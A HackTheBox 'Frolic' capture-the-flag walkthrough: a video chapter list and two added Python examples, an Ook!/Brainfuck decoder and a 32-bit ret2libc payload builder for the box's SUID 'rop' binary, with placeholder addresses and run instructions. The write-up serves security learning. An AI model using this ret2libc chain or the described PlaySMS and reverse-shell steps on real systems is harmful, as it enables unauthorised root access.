HackTheBox - Frolic

[Video: YouTube ID b6WGQSJu_zQ]

01:16 - Beginning of recon; until around 13 minutes, gathering information to avoid rabbit holes
04:04 - Using nc/ncat to verify a port is open (-zv)
11:17 - Running gobuster across many of the subdirectories
13:03 - Examining /admin/ - Examine the HTML Source because login is not sending any data
14:09 - Discover some weird text encoding (Ook), how I went about decoding it
15:44 - Decoded to base64 with some spaces, clean up the base64 and are left with a zip file
19:19 - After cracking the zip, there is another text encoding challenge (BrainF*)
25:11 - With potential information, return to our long running recon for more information
28:49 - Discovering /playsms
32:00 - Reading ExploitDB articles and then attempting to manually exploit PlaySMS via uploading a CSV
34:34 - Getting a reverse shell
39:00 - Running LinEnum.sh
40:00 - Finding the SetUID file: rop
42:00 - Exploiting ROP Program with ret2libc
45:30 - Getting offsets of system, exit, /bin/sh from libc using ldd, readelf, and strings
50:34 - Running our exploit to get root shell
54:00 - Beginning of recovering the rop.c source code
56:41 - Recreating rop.c then compiling
59:44 - Copying the physical disk to our local box via SSH and dd
01:01:44 - Using PhotoRec to restore files and finding rop.c
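The 14:09 and 19:19 chapters both come down to the same trick: Ook! is Brainfuck with each instruction spelled as a pair of "Ook" tokens, so one interpreter handles both encodings, and the 15:44 step is just stripping whitespace before base64-decoding and checking for the zip magic bytes. The following is an added example written for this page, not ippsec's script from the video; the Brainfuck program, its Ook! form, and the base64 sample are constructed inputs, not the strings from the box.

```python
import base64
import re

# Ook! is Brainfuck with each of the eight instructions spelled as a pair of "Ook" tokens.
OOK_TO_BF = {
    ("Ook.", "Ook?"): ">",
    ("Ook?", "Ook."): "<",
    ("Ook.", "Ook."): "+",
    ("Ook!", "Ook!"): "-",
    ("Ook!", "Ook."): ".",
    ("Ook.", "Ook!"): ",",
    ("Ook!", "Ook?"): "[",
    ("Ook?", "Ook!"): "]",
}
BF_TO_OOK = {bf: ook for ook, bf in OOK_TO_BF.items()}


def ook_to_bf(text):
    """Translate an Ook! program into Brainfuck; anything that is not an Ook token is ignored."""
    tokens = re.findall(r"Ook[.?!]", text)
    if len(tokens) % 2:
        raise ValueError("Ook! program has an odd number of tokens")
    return "".join(OOK_TO_BF[pair] for pair in zip(tokens[0::2], tokens[1::2]))


def bf_to_ook(code):
    """Inverse translation, used here only to construct the sample input."""
    return " ".join(" ".join(BF_TO_OOK[c]) for c in code if c in BF_TO_OOK)


def run_bf(code, stdin=b"", tape_size=30000, max_steps=1_000_000):
    """Minimal Brainfuck interpreter with 8-bit wrapping cells and a step limit
    so a malformed or hostile program cannot spin forever."""
    jumps, stack = {}, []
    for i, c in enumerate(code):
        if c == "[":
            stack.append(i)
        elif c == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at {i}")
            j = stack.pop()
            jumps[i], jumps[j] = j, i
    if stack:
        raise ValueError(f"unmatched '[' at {stack[-1]}")
    tape = bytearray(tape_size)
    ptr = pc = in_pos = steps = 0
    out = bytearray()
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded")
        c = code[pc]
        if c == ">":
            ptr = (ptr + 1) % tape_size
        elif c == "<":
            ptr = (ptr - 1) % tape_size
        elif c == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif c == ".":
            out.append(tape[ptr])
        elif c == ",":
            tape[ptr] = stdin[in_pos] if in_pos < len(stdin) else 0
            in_pos += 1
        elif c == "[" and tape[ptr] == 0:
            pc = jumps[pc]          # skip the loop body
        elif c == "]" and tape[ptr] != 0:
            pc = jumps[pc]          # back to the matching '[' (pc += 1 below re-enters the body)
        pc += 1
    return bytes(out)


def decode_ook(text, stdin=b""):
    return run_bf(ook_to_bf(text), stdin)


def clean_base64(text):
    """The Ook! output in the video decoded to base64 with stray whitespace; drop it before decoding."""
    return base64.b64decode(re.sub(r"\s+", "", text))


def looks_like_zip(data):
    """Local-file-header magic of a zip archive, the same thing `file` keys on."""
    return data[:4] == b"PK\x03\x04"


# Constructed sample: Brainfuck that prints "AB" (8*8+1 = 65 = 'A'), and the same program as Ook!.
BF_SAMPLE = "++++++++[>++++++++<-]>+.+."
OOK_SAMPLE = bf_to_ook(BF_SAMPLE)

if __name__ == "__main__":
    print(OOK_SAMPLE)
    print(decode_ook(OOK_SAMPLE))
    blob = clean_base64("UEsD BAoA")     # constructed: base64 of a zip local-file header prefix
    print(blob, looks_like_zip(blob))
```

In practice you paste the Ook! text from the page into decode_ook, feed the printed bytes to clean_base64, and write the result to disk once looks_like_zip says it is an archive; the step limit matters because a truncated copy-paste can leave an unterminated loop.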
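For the 42:00 to 50:34 chapters, the ret2libc chain against a 32-bit SUID binary has a fixed shape: padding up to the saved return address, then the address of system(), a fake return address (exit(), so the program does not crash after the shell closes), and finally a pointer to "/bin/sh" as system's one argument. The block below is an added example for this page, not the exploit script from the video. It assumes a static libc base (ASLR off, which is what makes the address printed by ldd usable directly), and the padding length, libc base, and symbol offsets are made-up placeholders standing in for what readelf -s and ldd report on the target; the libc image it searches is a constructed blob, not a real libc.

```python
import struct


def p32(value):
    """Pack a 32-bit address little-endian, as it sits on the x86 stack."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def find_string_offset(image, needle=b"/bin/sh\x00"):
    """Offset of a NUL-terminated string inside a libc image: the number that
    `strings -a -t x libc.so.6 | grep /bin/sh` prints. Valid as a memory offset
    because glibc's first PT_LOAD segment maps file offset 0 at the load base."""
    off = image.find(needle)
    if off < 0:
        raise ValueError("string not present in image")
    return off


def build_ret2libc(pad_len, libc_base, system_off, exit_off, binsh_off):
    """32-bit ret2libc chain: saved EIP -> system(), return address -> exit(),
    single argument -> "/bin/sh". Offsets are what `readelf -s libc.so.6` reports."""
    return (b"A" * pad_len
            + p32(libc_base + system_off)   # overwrites the saved return address
            + p32(libc_base + exit_off)     # where system() returns to
            + p32(libc_base + binsh_off))   # system()'s argument


def nul_positions(payload):
    """The payload travels in argv, and argv strings end at the first NUL byte,
    so any 0x00 inside an address silently truncates the chain."""
    return [i for i, b in enumerate(payload) if b == 0]


# Constructed stand-in for a libc image: 0x1234 bytes of filler, then the string we need.
FAKE_LIBC = b"\x90" * 0x1234 + b"/bin/sh\x00" + b"\x90" * 64

# Placeholder values (assumptions, not the real numbers from the box).
PAD_LEN = 52             # bytes from the start of the buffer to the saved EIP
LIBC_BASE = 0xB7E19000   # what `ldd ./rop` would print for libc with ASLR off
SYSTEM_OFF = 0x3ADA0     # readelf -s libc.so.6 | grep ' system@@'
EXIT_OFF = 0x2E9D0       # readelf -s libc.so.6 | grep ' exit@@'


def demo_payload():
    binsh_off = find_string_offset(FAKE_LIBC)
    return build_ret2libc(PAD_LEN, LIBC_BASE, SYSTEM_OFF, EXIT_OFF, binsh_off)


if __name__ == "__main__":
    payload = demo_payload()
    bad = nul_positions(payload)
    if bad:
        raise SystemExit(f"NUL bytes at {bad}; argv would truncate the chain")
    # On the target this is what ends up in:  ./rop "$(python3 -c 'import sys; sys.stdout.buffer.write(...)')"
    print(payload)
```

Before running it for real, confirm ASLR is actually off (cat /proc/sys/kernel/randomize_va_space prints 0) and that ldd gives the same libc address on two consecutive runs; if it does not, the base must be leaked at runtime and the offsets added to that leak instead.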

Reviewed by Anonymous on March 23, 2019. Rating: 5